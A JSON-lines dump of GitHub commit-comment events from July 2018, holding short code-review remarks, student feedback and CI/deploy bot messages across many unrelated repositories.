{"id":"7929863064","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"gaskinsjro/chatarang"},"payload":{"comment":{"id":29623733,"position":null,"line":null,"path":null,"commit_id":"8ad2aecb5928bc14fc848f011e0eaab48dd0e4c8","created_at":"2018-07-06T16:31:15Z","updated_at":"2018-07-06T16:31:15Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:31:15Z"}
{"id":"7929863664","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"gaskinsjro/chatarang"},"payload":{"comment":{"id":29623736,"position":null,"line":null,"path":null,"commit_id":"84aed9560e5479c64f49b7099e50bda6d988af30","created_at":"2018-07-06T16:31:22Z","updated_at":"2018-07-06T16:31:22Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:31:22Z"}
{"id":"7929863961","type":"CommitCommentEvent","actor":{"login":"sakshi2207"},"repo":{"name":"sakshi2207/first"},"payload":{"comment":{"id":29623737,"position":null,"line":null,"path":null,"commit_id":"b70541a5057695313efccc56ef648ded6b42f6c8","created_at":"2018-07-06T16:31:27Z","updated_at":"2018-07-06T16:31:27Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-06T16:31:27Z"}
{"id":"7929866169","type":"CommitCommentEvent","actor":{"login":"sakshi2207"},"repo":{"name":"sakshi2207/first"},"payload":{"comment":{"id":29623741,"position":null,"line":null,"path":null,"commit_id":"b70541a5057695313efccc56ef648ded6b42f6c8","created_at":"2018-07-06T16:31:55Z","updated_at":"2018-07-06T16:31:55Z","author_association":"OWNER","body":"world"}},"created_at":"2018-07-06T16:31:55Z"}
{"id":"7929870026","type":"CommitCommentEvent","actor":{"login":"kevinkotowski"},"repo":{"name":"081888thLite/ttt"},"payload":{"comment":{"id":29623742,"position":null,"line":null,"path":null,"commit_id":"5ec7efb1b67dc06ddb02c3aac099db6d812905e0","created_at":"2018-07-06T16:32:48Z","updated_at":"2018-07-06T16:32:48Z","author_association":"NONE","body":"This line doesn't work as written. It assumes you are using `go` as a directory in my $GOPATH directory."}},"created_at":"2018-07-06T16:32:48Z"}
{"id":"7929874450","type":"CommitCommentEvent","actor":{"login":"pavelmalik"},"repo":{"name":"pavelmalik/BMWCanBridge"},"payload":{"comment":{"id":29623746,"position":null,"line":null,"path":null,"commit_id":"874fb6aeca684caa7831e4c860ea6164c6ab0ec9","created_at":"2018-07-06T16:33:49Z","updated_at":"2018-07-06T16:33:49Z","author_association":"OWNER","body":"Hi,\nI haven't spent any time looking at the lin bus traffic - my understanding\nis that there's some challenge-response protocol where the camera sends\nsome bytes that are encrypted by the controller and sent back to the\ncamera. To get the encryption scheme you'd have to dump the controler\neeprom.\n\nOn Sun, Jul 1, 2018 at 8:37 PM, tgisdaehyun <notifications@github.com>\nwrote:\n\n> Hi, I have a booting NIVI1 camera(displaying Autoliv, Indigo, Flir logo).\n> unfortunately, I don't have the matching NVE controller but only the\n> camera. I know the camera is waiting for LIN commands to be activated. I am\n> wondering if you have had any chance to monitor LIN communication between\n> NVK and NVE and what kind of communication is happening? thanks.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pavelmalik/BMWCanBridge/commit/874fb6aeca684caa7831e4c860ea6164c6ab0ec9#commitcomment-29560331>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGwd24IVaCivMvr5J_x6UCZ_EkrXeEKPks5uCXlngaJpZM4U-kMG>\n> .\n>\n"}},"created_at":"2018-07-06T16:33:49Z"}
{"id":"7929875580","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29623748,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T16:34:06Z","updated_at":"2018-07-06T16:34:06Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T16:34:06Z"}
{"id":"7929878207","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29623753,"position":null,"line":null,"path":null,"commit_id":"41da12e6bdc213c6aa331d59ee9a60a2a1103e57","created_at":"2018-07-06T16:34:37Z","updated_at":"2018-07-06T16:34:37Z","author_association":"CONTRIBUTOR","body":"If you want commands to be ran through chat filters, then you should add a check for each command that can be shown to the room/broadcasted.\r\n\r\nSpecifically, they should run through ``this.canTalk(target)``"}},"created_at":"2018-07-06T16:34:37Z"}
{"id":"7929880096","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"PatrickConboy/chatarang"},"payload":{"comment":{"id":29623755,"position":null,"line":null,"path":null,"commit_id":"a8a6f93a5f02493c2885929df047582b3eb14105","created_at":"2018-07-06T16:35:01Z","updated_at":"2018-07-06T16:35:01Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T16:35:01Z"}
{"id":"7929881862","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"PatrickConboy/chatarang"},"payload":{"comment":{"id":29623759,"position":null,"line":null,"path":null,"commit_id":"ee2affdbb9f01fea75c6875cacd13ea36f5d47ba","created_at":"2018-07-06T16:35:27Z","updated_at":"2018-07-06T16:35:27Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:35:27Z"}
{"id":"7929883290","type":"CommitCommentEvent","actor":{"login":"Sergei1s"},"repo":{"name":"Sergei1s/CalculatorWPF"},"payload":{"comment":{"id":29623761,"position":null,"line":null,"path":null,"commit_id":"bba6761b3410bb0c5c8485aae9ccdd2ad417be29","created_at":"2018-07-06T16:35:47Z","updated_at":"2018-07-06T16:35:47Z","author_association":"OWNER","body":"Daaaaamn!!!!\r\n"}},"created_at":"2018-07-06T16:35:47Z"}
{"id":"7929883443","type":"CommitCommentEvent","actor":{"login":"caarlos0"},"repo":{"name":"gohugoio/hugo"},"payload":{"comment":{"id":29623762,"position":4,"line":195,"path":"CONTRIBUTING.md","commit_id":"dea71670c059ab4d5a42bd22503f18c087dd22d4","created_at":"2018-07-06T16:35:49Z","updated_at":"2018-07-06T16:35:49Z","author_association":"CONTRIBUTOR","body":"@bep did you test building it with goreleaser yet? Just wondering if the CGO can bring in any issues..."}},"created_at":"2018-07-06T16:35:49Z"}
{"id":"7929883570","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29623763,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-06T16:35:51Z","updated_at":"2018-07-06T16:35:51Z","author_association":"NONE","body":"@radious thanks for the report, it's very helpful; I expected this could happen but concrete reports are more convincing.\r\nThe process is not fully reliable and (at least for now) you should edit the file away to remove the shorter entry — the comment points out you can tweak the generated output. This is also discussed in #10906 (from https://github.com/syl20bnr/spacemacs/issues/10906#issuecomment-402839104 on)."}},"created_at":"2018-07-06T16:35:51Z"}
{"id":"7929887377","type":"CommitCommentEvent","actor":{"login":"SkyhighMcAfee"},"repo":{"name":"McAfee-Demo/McAfeeDemoRepo"},"payload":{"comment":{"id":29623765,"position":1,"line":null,"path":"1530894995.42/github_test.txt","commit_id":"31d8aa8c75f1afc0973ac159d52f657be469504e","created_at":"2018-07-06T16:36:42Z","updated_at":"2018-07-06T16:36:42Z","author_association":"MEMBER","body":"889976543"}},"created_at":"2018-07-06T16:36:42Z"}
{"id":"7929893028","type":"CommitCommentEvent","actor":{"login":"JQ-K"},"repo":{"name":"JQ-K/learnDjango"},"payload":{"comment":{"id":29623771,"position":16,"line":56,"path":"test3/booktest/views.py","commit_id":"6e2c949b9e06f33dd27b038de9f51e8edd56cff8","created_at":"2018-07-06T16:38:03Z","updated_at":"2018-07-06T16:38:03Z","author_association":"OWNER","body":"tag"}},"created_at":"2018-07-06T16:38:03Z"}
{"id":"7929896160","type":"CommitCommentEvent","actor":{"login":"ErikBjare"},"repo":{"name":"SuperuserLabs/thankful-server"},"payload":{"comment":{"id":29623777,"position":null,"line":null,"path":null,"commit_id":"a23e6a4992f5e84b566d04e42aa2be983356b16c","created_at":"2018-07-06T16:38:47Z","updated_at":"2018-07-06T16:38:47Z","author_association":"MEMBER","body":"lol, just fixed the tests properly"}},"created_at":"2018-07-06T16:38:47Z"}
{"id":"7929898349","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Prarintita/chattychat"},"payload":{"comment":{"id":29623783,"position":null,"line":null,"path":null,"commit_id":"c418f1b1dbbdd7affa783e166ecc107f3987cdd0","created_at":"2018-07-06T16:39:16Z","updated_at":"2018-07-06T16:39:16Z","author_association":"NONE","body":"This is a pretty big commit. Try to commit more often and have smaller commits. That makes it easier to refer back to your code later. Otherwise, good work. 👍 "}},"created_at":"2018-07-06T16:39:16Z"}
{"id":"7929903477","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"rebeccakim14/chatarang"},"payload":{"comment":{"id":29623795,"position":null,"line":null,"path":null,"commit_id":"b6738b117f8fe18eebb9ec6e8b149a6b562f6b0e","created_at":"2018-07-06T16:40:26Z","updated_at":"2018-07-06T16:40:26Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T16:40:26Z"}
{"id":"7929903518","type":"CommitCommentEvent","actor":{"login":"abc0922001"},"repo":{"name":"sekaiacg/skymi"},"payload":{"comment":{"id":29623796,"position":null,"line":null,"path":null,"commit_id":"34bc9af99026f47227909d88c0a9e6548f01609a","created_at":"2018-07-06T16:40:27Z","updated_at":"2018-07-06T16:40:27Z","author_association":"NONE","body":"終於找到給小米6MIUI10的內核了，希望能繼續更新\r\n\r\n請問您有發在哪裡的論壇嗎？我是從Popkern-sagit的github issue找到的"}},"created_at":"2018-07-06T16:40:27Z"}
{"id":"7929904693","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"rebeccakim14/chatarang"},"payload":{"comment":{"id":29623797,"position":null,"line":null,"path":null,"commit_id":"93c86711b12e05b91f53b7125fc1799d07fb3705","created_at":"2018-07-06T16:40:43Z","updated_at":"2018-07-06T16:40:43Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:40:43Z"}
{"id":"7929905433","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29623799,"position":8,"line":80,"path":"scripts/microbe_stage/movement_organelle.as","commit_id":"86fc41084d796cd3cefe707b54dd1f132358ba17","created_at":"2018-07-06T16:40:53Z","updated_at":"2018-07-06T16:40:53Z","author_association":"CONTRIBUTOR","body":"GetExternalOrganelle probably wants the position in the same coordinate system as `MembraneComponent::sendOrganelles(double x, double y);` So using `organellePos` might actually give the right point. Then just some 2d math to calculate the right angle and fixing the base rotation difference between the player and npc species."}},"created_at":"2018-07-06T16:40:53Z"}
{"id":"7929907245","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"rebeccakim14/chatarang"},"payload":{"comment":{"id":29623804,"position":null,"line":null,"path":null,"commit_id":"a06490fdfc54ded095a6d8305dd41dc76f466ce0","created_at":"2018-07-06T16:41:19Z","updated_at":"2018-07-06T16:41:19Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:41:19Z"}
{"id":"7929907456","type":"CommitCommentEvent","actor":{"login":"yuxizhe"},"repo":{"name":"yuxizhe/ibm-nebulas-server"},"payload":{"comment":{"id":29623806,"position":null,"line":null,"path":null,"commit_id":"23f34b7220f48755321038bda515309ac8d675c8","created_at":"2018-07-06T16:41:21Z","updated_at":"2018-07-06T16:41:21Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ca0757e4-472c-4da3-bb01-4158fbfe38d1?env_id=ibm%3Ayp%3Aus-south \"nebulas\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/03c75b85-42c8-405f-9df7-7daf9bf95c65?env_id=ibm%3Ayp%3Aus-south \"nebulas\") deployed [ibm-nebulas-server](https://github.com/yuxizhe/ibm-nebulas-server/releases/tag/deploy-ibm-yp-us-south-yuxizhe2008-yu-20180706-164121 \"deploy-ibm-yp-us-south-yuxizhe2008-yu-20180706-164121\") to [yu](https://console.bluemix.net/apps/b353996b-ddf5-49c4-ba38-6736c0d6fad9?env_id=ibm:yp:us-south \"ibm:yp:us-south:yuxizhe2008:yu\"), including this commit"}},"created_at":"2018-07-06T16:41:21Z"}
{"id":"7929913595","type":"CommitCommentEvent","actor":{"login":"decriptor"},"repo":{"name":"ermau/Tempest"},"payload":{"comment":{"id":29623814,"position":10,"line":104,"path":"Desktop/Tempest/Tests/MessageResponseManagerTests.cs","commit_id":"74f195c4c8f08f9161475d2ae5500ad04079acf1","created_at":"2018-07-06T16:42:40Z","updated_at":"2018-07-06T16:42:40Z","author_association":"NONE","body":"I always thought it was \"bad practice\" to use `Thread.Sleep`. A better option is Task.Delay?"}},"created_at":"2018-07-06T16:42:40Z"}
{"id":"7929915621","type":"CommitCommentEvent","actor":{"login":"fraxd"},"repo":{"name":"fraxd/CubiSentiBuster"},"payload":{"comment":{"id":29623817,"position":null,"line":null,"path":null,"commit_id":"79a00343cc73c967324057486a42f2642b2331a9","created_at":"2018-07-06T16:43:08Z","updated_at":"2018-07-06T16:43:08Z","author_association":"OWNER","body":"mmm no lo se rick"}},"created_at":"2018-07-06T16:43:08Z"}
{"id":"7929917635","type":"CommitCommentEvent","actor":{"login":"wf13as"},"repo":{"name":"wf13as/myProject13"},"payload":{"comment":{"id":29623821,"position":null,"line":null,"path":null,"commit_id":"544f7b8654d463793152d88ab0f743e8b63f80fb","created_at":"2018-07-06T16:43:37Z","updated_at":"2018-07-06T16:43:37Z","author_association":"OWNER","body":"Проверка."}},"created_at":"2018-07-06T16:43:37Z"}
{"id":"7929919154","type":"CommitCommentEvent","actor":{"login":"Dripdrop12"},"repo":{"name":"ficonsulting/RInno"},"payload":{"comment":{"id":29623824,"position":null,"line":null,"path":null,"commit_id":"e545df8ba913cc310ca7ecca0785c84f7d37de44","created_at":"2018-07-06T16:43:58Z","updated_at":"2018-07-06T16:43:58Z","author_association":"MEMBER","body":"I'm pretty sure my company's website isn't blocked in China, but just in case, it is now an input you can control ;)"}},"created_at":"2018-07-06T16:43:58Z"}
{"id":"7929925679","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623838,"position":474,"line":1084,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:45:29Z","updated_at":"2018-07-06T16:45:29Z","author_association":"CONTRIBUTOR","body":"I think :samp: should be used here instead of :command:\r\n:samp:`pkg install audiotag`\r\n"}},"created_at":"2018-07-06T16:45:29Z"}
{"id":"7929927131","type":"CommitCommentEvent","actor":{"login":"mps4dev"},"repo":{"name":"Nebres/Kodilla-Course"},"payload":{"comment":{"id":29623841,"position":28,"line":20,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/FlightRunner.java","commit_id":"bb04bfc03426b46b2b1b9cee6d9aad368da823c7","created_at":"2018-07-06T16:45:50Z","updated_at":"2018-07-06T16:45:50Z","author_association":"COLLABORATOR","body":"To teraz zastanów się, czy byś tak chciał, że jeśli metoda twoja rzuci wyjątek, to dostajesz stacktrace. :-) musisz rozróżnić dwie sytuacje wyjątków: coś się złego stało (np. plik ktoś usunął) oraz taka jest logika. U ciebie rzucony jest wyjątek IOException, gdy coś złego się stało, natomiast ten drugi wyjątek, to wynik działania logiki programu - nic złego się nie stało, ale nie znaleziono lotu, a więc zamiast wypisywać stacktrace, w takiej sytuacji poprostu trzeba wypisać stosowny (w miarę szczegółowy) komunikat"}},"created_at":"2018-07-06T16:45:50Z"}
{"id":"7929931308","type":"CommitCommentEvent","actor":{"login":"decriptor"},"repo":{"name":"ermau/Tempest"},"payload":{"comment":{"id":29623852,"position":5,"line":55,"path":"Tempest/MessageResponseManager.cs","commit_id":"74f195c4c8f08f9161475d2ae5500ad04079acf1","created_at":"2018-07-06T16:46:51Z","updated_at":"2018-07-06T16:46:51Z","author_association":"NONE","body":"Maybe have an extension method if this is going to be done more than once? a couple time?\r\n\r\n`DateTime.FromTimeout`? Or maybe just a method?"}},"created_at":"2018-07-06T16:46:51Z"}
{"id":"7929932898","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623855,"position":479,"line":1088,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:47:16Z","updated_at":"2018-07-06T16:47:16Z","author_association":"CONTRIBUTOR","body":"I say get rid of the before dependencies\r\n...indicate if the package and dependencies successfully download..."}},"created_at":"2018-07-06T16:47:16Z"}
{"id":"7929932928","type":"CommitCommentEvent","actor":{"login":"chrismattmann"},"repo":{"name":"deeplearning4j/deeplearning4j"},"payload":{"comment":{"id":29623856,"position":null,"line":null,"path":null,"commit_id":"a0a0234d611311a2a736c38adb784af4f6f2b5aa","created_at":"2018-07-06T16:47:16Z","updated_at":"2018-07-06T16:47:16Z","author_association":"NONE","body":"thanks @maxpumperla "}},"created_at":"2018-07-06T16:47:16Z"}
{"id":"7929933887","type":"CommitCommentEvent","actor":{"login":"koikonom"},"repo":{"name":"hashicorp/terraform-website"},"payload":{"comment":{"id":29623858,"position":5,"line":267,"path":"content/source/docs/enterprise/private/install-installer.html.md","commit_id":"366349b1b58e9502b70862f5faa8c0816c8a708c","created_at":"2018-07-06T16:47:31Z","updated_at":"2018-07-06T16:47:31Z","author_association":"CONTRIBUTOR","body":"ALL THE THINGS! (in other words: LGTM :shipit: )"}},"created_at":"2018-07-06T16:47:31Z"}
{"id":"7929934828","type":"CommitCommentEvent","actor":{"login":"scottyplunkett"},"repo":{"name":"081888thLite/ttt"},"payload":{"comment":{"id":29623861,"position":null,"line":null,"path":null,"commit_id":"5ec7efb1b67dc06ddb02c3aac099db6d812905e0","created_at":"2018-07-06T16:47:45Z","updated_at":"2018-07-06T16:47:45Z","author_association":"COLLABORATOR","body":"My understanding is that even were you to not have a /go directory set as\nyour primary go workspace, upon running the go get command this package\nwill be placed into one... from the docs:\n\n The GOPATH environment variable specifies the location of your workspace.\nIt defaults to a directory named go inside your home directory, so $HOME/go on\nUnix, $home/go on Plan 9, and %USERPROFILE%\\go (usually C:\\Users\\YourName\\go)\non Windows.\n\nWhen you ran go get ... was the package placed under a different directory\nyou had set up?\n\nOn Fri, Jul 6, 2018 at 11:32 AM Kevin Kotowski <notifications@github.com>\nwrote:\n\n> This line doesn't work as written. It assumes you are using go as a\n> directory in my $GOPATH directory.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/081888thLite/ttt/commit/5ec7efb1b67dc06ddb02c3aac099db6d812905e0#commitcomment-29623742>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AeY_LC57LsR1eeSeIvKhCHs4g0KVxageks5uD5EwgaJpZM4VFuU0>\n> .\n>\n"}},"created_at":"2018-07-06T16:47:45Z"}
{"id":"7929939101","type":"CommitCommentEvent","actor":{"login":"luriel-xyz"},"repo":{"name":"luriel-xyz/Tekfix"},"payload":{"comment":{"id":29623866,"position":null,"line":null,"path":null,"commit_id":"4811c2c51aec7ebb0694f9eb248b7de35ec6e1c2","created_at":"2018-07-06T16:48:46Z","updated_at":"2018-07-06T16:48:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Login/Sign Up Page](https://trello.com/c/1xOKQzKK/3-login-sign-up-page)"}},"created_at":"2018-07-06T16:48:46Z"}
{"id":"7929939829","type":"CommitCommentEvent","actor":{"login":"btzy"},"repo":{"name":"btzy/circuit-sandbox"},"payload":{"comment":{"id":29623869,"position":155,"line":134,"path":"CircuitSandbox/pencilaction.hpp","commit_id":"c661f4917e9f6d088d87163b0f14892b95d39e71","created_at":"2018-07-06T16:48:57Z","updated_at":"2018-07-06T16:48:57Z","author_association":"OWNER","body":"It probably shouldn't apply to Source because Source isn't affect by signals around it. It should only apply to relays and logic gates."}},"created_at":"2018-07-06T16:48:57Z"}
{"id":"7929941939","type":"CommitCommentEvent","actor":{"login":"ermau"},"repo":{"name":"ermau/Tempest"},"payload":{"comment":{"id":29623875,"position":10,"line":104,"path":"Desktop/Tempest/Tests/MessageResponseManagerTests.cs","commit_id":"74f195c4c8f08f9161475d2ae5500ad04079acf1","created_at":"2018-07-06T16:49:25Z","updated_at":"2018-07-06T16:49:25Z","author_association":"OWNER","body":"AFAIK the only thing Delay offers over Sleep is a `Task`, it's significantly heavier. Nothing wrong with using `Sleep` in the right use cases. Also this is a test so.."}},"created_at":"2018-07-06T16:49:25Z"}
{"id":"7929942100","type":"CommitCommentEvent","actor":{"login":"DhruvaHegde"},"repo":{"name":"DhruvaHegde/100DaysofMLCode"},"payload":{"comment":{"id":29623876,"position":2,"line":2,"path":"README.md","commit_id":"1422cee0bd5101d710a2168f41fe0b2699ccb48a","created_at":"2018-07-06T16:49:27Z","updated_at":"2018-07-06T16:49:27Z","author_association":"OWNER","body":"Day 1 : Learned Gradient Descent and implemented it for simple and multi linear regression. Also learned R-square test to test the model.\r\n"}},"created_at":"2018-07-06T16:49:27Z"}
{"id":"7929946163","type":"CommitCommentEvent","actor":{"login":"darkdh"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":29623883,"position":null,"line":null,"path":null,"commit_id":"25bd55d862a25d28a8be0e6bf7cbfb7343220cdd","created_at":"2018-07-06T16:50:21Z","updated_at":"2018-07-06T16:50:21Z","author_association":"NONE","body":"++"}},"created_at":"2018-07-06T16:50:21Z"}
{"id":"7929946826","type":"CommitCommentEvent","actor":{"login":"sebastianst"},"repo":{"name":"encryptogroup/ABY"},"payload":{"comment":{"id":29623885,"position":null,"line":null,"path":null,"commit_id":"f6f3ade58797a0965ad0628fa56c8b7e54a2f7b0","created_at":"2018-07-06T16:50:31Z","updated_at":"2018-07-06T16:50:31Z","author_association":"CONTRIBUTOR","body":"Thanks @lenerd !\r\nIMHO the most important files to cleanup would be `src/abycore/{aby/abyparty,circuit/share}.{cpp,h}` because wherever you instantiate an ABYparty, you `#include \"abyparty.h\"`. Would be great if you could move as many headers and inline definitions from `abyparty.h` into `abyparty.cpp` as possible and maybe use some forward declarations. Thanks!"}},"created_at":"2018-07-06T16:50:31Z"}
{"id":"7929949880","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29623892,"position":null,"line":null,"path":null,"commit_id":"a49dce7876ac004c152fb387b1257d605996863f","created_at":"2018-07-06T16:51:13Z","updated_at":"2018-07-06T16:51:13Z","author_association":"COLLABORATOR","body":"Puzzle `1307-a0596409` disappeared from [`src/main/java/com/zerocracy/pm/Claims.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/Claims.java), that's why I closed #1317. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-06T16:51:13Z"}
{"id":"7929952910","type":"CommitCommentEvent","actor":{"login":"DimaKazankov"},"repo":{"name":"Sergei1s/CalculatorWPF"},"payload":{"comment":{"id":29623902,"position":null,"line":null,"path":null,"commit_id":"bba6761b3410bb0c5c8485aae9ccdd2ad417be29","created_at":"2018-07-06T16:51:58Z","updated_at":"2018-07-06T16:51:58Z","author_association":"COLLABORATOR","body":"What? =)"}},"created_at":"2018-07-06T16:51:58Z"}
{"id":"7929956417","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29623907,"position":null,"line":null,"path":null,"commit_id":"7532a5580a98c00de79b8756c33c6bb5ddb04acb","created_at":"2018-07-06T16:52:48Z","updated_at":"2018-07-06T16:52:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T16:52:48Z"}
{"id":"7929956810","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"richuang1/chatarang"},"payload":{"comment":{"id":29623908,"position":null,"line":null,"path":null,"commit_id":"7433f6e5fa9f417a1ca016f137b924dfa6a4dad7","created_at":"2018-07-06T16:52:55Z","updated_at":"2018-07-06T16:52:55Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:52:55Z"}
{"id":"7929957773","type":"CommitCommentEvent","actor":{"login":"jimboca"},"repo":{"name":"UniversalDevicesInc/polyglot-v2-python-interface"},"payload":{"comment":{"id":29623911,"position":null,"line":null,"path":null,"commit_id":"01fdc0ee9e0b8e457a6ab194a4dc8619f56f5d86","created_at":"2018-07-06T16:53:09Z","updated_at":"2018-07-06T16:53:09Z","author_association":"CONTRIBUTOR","body":"Isn't this logic backwards?  Shouldn't it set it to False when clear is True?"}},"created_at":"2018-07-06T16:53:09Z"}
{"id":"7929958592","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"richuang1/chatarang"},"payload":{"comment":{"id":29623914,"position":null,"line":null,"path":null,"commit_id":"f879f332d7b54d598df7905eff2b1fa60eb4b79b","created_at":"2018-07-06T16:53:20Z","updated_at":"2018-07-06T16:53:20Z","author_association":"NONE","body":"👍 Good work. This is a pretty big commit, so try to commit more often with smaller chunks of code. "}},"created_at":"2018-07-06T16:53:20Z"}
{"id":"7929959827","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"richuang1/chatarang"},"payload":{"comment":{"id":29623921,"position":null,"line":null,"path":null,"commit_id":"e82e1bb8de84f141eec9fcd3b6dd16f1b2a484b5","created_at":"2018-07-06T16:53:38Z","updated_at":"2018-07-06T16:53:38Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:53:38Z"}
{"id":"7929960527","type":"CommitCommentEvent","actor":{"login":"hchourasia"},"repo":{"name":"hchourasia/100DaysOfMLCode.github.io"},"payload":{"comment":{"id":29623923,"position":null,"line":null,"path":null,"commit_id":"3db7ea4fa83098766a6055b52c451a0f3271d45e","created_at":"2018-07-06T16:53:47Z","updated_at":"2018-07-06T16:53:47Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-06T16:53:47Z"}
{"id":"7929968480","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"srandhaw/Slack-web-app"},"payload":{"comment":{"id":29623940,"position":null,"line":null,"path":null,"commit_id":"beb3e55cbb1a4babcdc9631d3f9ee099649018a3","created_at":"2018-07-06T16:55:33Z","updated_at":"2018-07-06T16:55:33Z","author_association":"NONE","body":"👍 Try to make your commit messages finish the sentence \"This commit will..\" For example, for this commit it would be more like \"Style the sidebar component\"."}},"created_at":"2018-07-06T16:55:33Z"}
{"id":"7929968827","type":"CommitCommentEvent","actor":{"login":"tschellenbach"},"repo":{"name":"GetStream/Winds"},"payload":{"comment":{"id":29623941,"position":4,"line":40,"path":"api/src/controllers/rss.js","commit_id":"797a6a5ca74f5dff4b0258eb1a4a91fa6d9f4de6","created_at":"2018-07-06T16:55:37Z","updated_at":"2018-07-06T16:55:37Z","author_association":"MEMBER","body":"don't we need to do this on the frontend?"}},"created_at":"2018-07-06T16:55:37Z"}
{"id":"7929969675","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"srandhaw/Slack-web-app"},"payload":{"comment":{"id":29623944,"position":null,"line":null,"path":null,"commit_id":"9b687d4acc522ab96a72e61faa954344ebf970a8","created_at":"2018-07-06T16:55:48Z","updated_at":"2018-07-06T16:55:48Z","author_association":"NONE","body":"👍 Good job using CSS in JS."}},"created_at":"2018-07-06T16:55:48Z"}
{"id":"7929971766","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"srandhaw/Slack-web-app"},"payload":{"comment":{"id":29623949,"position":null,"line":null,"path":null,"commit_id":"958b521faf05eb9c866c63fadd8cdbb90fd15209","created_at":"2018-07-06T16:56:18Z","updated_at":"2018-07-06T16:56:18Z","author_association":"NONE","body":"Try working on your commit messages."}},"created_at":"2018-07-06T16:56:18Z"}
{"id":"7929971907","type":"CommitCommentEvent","actor":{"login":"tschellenbach"},"repo":{"name":"GetStream/Winds"},"payload":{"comment":{"id":29623950,"position":null,"line":null,"path":null,"commit_id":"797a6a5ca74f5dff4b0258eb1a4a91fa6d9f4de6","created_at":"2018-07-06T16:56:20Z","updated_at":"2018-07-06T16:56:20Z","author_association":"MEMBER","body":"TODO: Disable RSS scraping and search indexing for feeds that have been marked as duplicateOf"}},"created_at":"2018-07-06T16:56:20Z"}
